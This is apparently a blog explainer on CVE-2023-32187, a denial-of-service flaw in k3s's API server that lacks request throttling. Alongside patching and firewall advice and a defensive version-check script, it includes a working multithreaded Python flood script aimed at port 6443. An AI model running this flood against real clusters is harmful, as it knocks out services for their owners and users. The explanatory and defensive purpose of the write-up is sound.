In May 2023, a serious vulnerability was disclosed in SUSE’s lightweight Kubernetes distribution, k3s: CVE-2023-32187. The flaw is a lack of allocation limits or throttling, and it lets an attacker crash an entire Kubernetes cluster with little effort, simply by sending traffic to one port.
This write-up explains, in basic terms, what the vulnerability is, how it works, and how attackers exploit it, including a demo code snippet. Finally, we cover how to protect your systems and where to find the original references.
What is CVE-2023-32187?
CVE-2023-32187 is an "Allocation of Resources Without Limits or Throttling" bug. The k3s server’s apiserver/supervisor service (normally listening on port 6443) did not limit or slow down incoming requests. If an attacker sends a large volume of requests, bogus or otherwise, the server can run out of memory, become unresponsive, and crash: a denial-of-service (DoS) attack.
How Bad Is It?
If anybody can talk to your k3s API server on tcp/6443, and you have not patched, you are at risk. Attackers do *not* need a user account or cluster access. All it takes is network reachability to the port.
How Does the Exploit Work?
The k3s API endpoint on 6443 accepts and processes as many connections and requests as the system can handle. Each request consumes some CPU and memory. With enough simultaneous connections, especially with large or complex payloads or a continuous flood, the API server’s resource usage grows until it becomes very slow or crashes outright.
The weak point: there were no effective limits or throttling on how fast a single client could make requests, or on how much of the server’s memory or CPU a request could consume.
Proof-of-Concept (PoC) Code: How to Reproduce the DoS
This Python code hammers the API server with requests. It does the simplest thing possible: it floods the /version endpoint with many concurrent connections. In real attacks, you would add more threads or send more complex requests.
> Warning: Only test this on your own system! Never attack a server you don’t own.
```python
import requests
import threading

API_SERVER = 'https://yourserver:6443/version'
NUM_THREADS = 100


def flood():
    # Loop forever, opening a new request as soon as the previous one finishes.
    while True:
        try:
            # verify=False skips certificate checks (k3s uses a self-signed CA
            # by default); urllib3 will print an InsecureRequestWarning.
            requests.get(API_SERVER, verify=False, timeout=1)
        except requests.RequestException:
            # Timeouts and connection errors are expected once the server
            # starts struggling; ignore them and keep going.
            pass


threads = []
for _ in range(NUM_THREADS):
    t = threading.Thread(target=flood)
    t.start()
    threads.append(t)

for t in threads:
    t.join()
```
After running for a few minutes (or less), you will notice that the k3s API server is overloaded or stops responding. On weak hardware or small cloud VMs, it can crash the node entirely.
How To Fix or Defend
1. Upgrade k3s to 1.28.1+k3s1. See SUSE’s official advisory for full details and downloads.
2. Restrict access with a firewall: if possible, block external access to port 6443 and allow only the nodes and users that *must* reach the API.
3. Network-level rate limiting: use firewalls, proxies, or load balancers to rate-limit connections to the API port.
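As an added example for step 1 (not code from the original post or from the k3s project), here is a small Python check that reads the JSON the apiserver returns from its /version endpoint and decides whether the reported k3s build predates the fixed release named above. The sample response body is constructed, `FIXED_VERSIONS` carries only the release this page names (extend it from SUSE’s advisory for other minor lines), and the `gitVersion` field is the standard Kubernetes /version field that holds the release string.

```python
import json
import re
from typing import Optional, Sequence

# Fixed release named on this page. Add entries from SUSE's advisory for
# backported fixes on other k3s minor lines; without them, older lines
# are reported as "unknown" (None) rather than guessed.
FIXED_VERSIONS = ("v1.28.1+k3s1",)

# k3s release strings look like v<major>.<minor>.<patch>+k3s<build>
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)\+k3s(\d+)$")


def parse_k3s_version(version: str) -> tuple:
    """'v1.27.4+k3s1' -> (1, 27, 4, 1); ValueError for non-k3s strings."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"not a k3s release version: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version: str,
                  fixed_versions: Sequence[str] = FIXED_VERSIONS) -> Optional[bool]:
    """True if older than the fix for its minor line, False if fixed or on a
    newer line than any fix, None if that minor line has no listed fix."""
    running = parse_k3s_version(version)
    fixed = sorted(parse_k3s_version(f) for f in fixed_versions)
    same_line = [f for f in fixed if f[:2] == running[:2]]
    if same_line:
        return running < min(same_line)
    if running[:2] > fixed[-1][:2]:
        return False  # minor line released after the fix landed
    return None  # older line not covered by the list: consult the advisory


def check_version_response(body: str,
                           fixed_versions: Sequence[str] = FIXED_VERSIONS) -> dict:
    """Evaluate the JSON body returned by the apiserver's /version endpoint."""
    info = json.loads(body)
    version = info["gitVersion"]
    return {"version": version, "vulnerable": is_vulnerable(version, fixed_versions)}


# Constructed sample body (not a real capture), in the shape /version returns.
SAMPLE_RESPONSE = ('{"major": "1", "minor": "28", "gitVersion": "v1.28.0+k3s1", '
                   '"platform": "linux/amd64"}')

if __name__ == "__main__":
    print(check_version_response(SAMPLE_RESPONSE))
```

Run it against `curl -k https://<server>:6443/version` output from your own cluster; the endpoint is reachable without credentials on a default k3s install, which is exactly why the missing throttling mattered.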
Links and Original References
- GitHub Security Advisory GHSA-55fv-6v5j-mv58
- CVE-2023-32187 at NIST/NVD
- SUSE Security Announcements
Conclusion
CVE-2023-32187 is a classic denial-of-service caused by missing resource throttling in k3s’s API server. If your clusters expose tcp/6443 and run a vulnerable version, *anyone* with network access can crash them in seconds. The issue is fixed in newer k3s releases, so always update and put network protections in front of your critical Kubernetes servers.
For more deep dives and fresh CVE breakdowns, follow our posts. Stay safe, and *patch your clusters*!
Timeline
Published on: 09/18/2023 13:15:00 UTC
Last modified on: 09/21/2023 15:21:00 UTC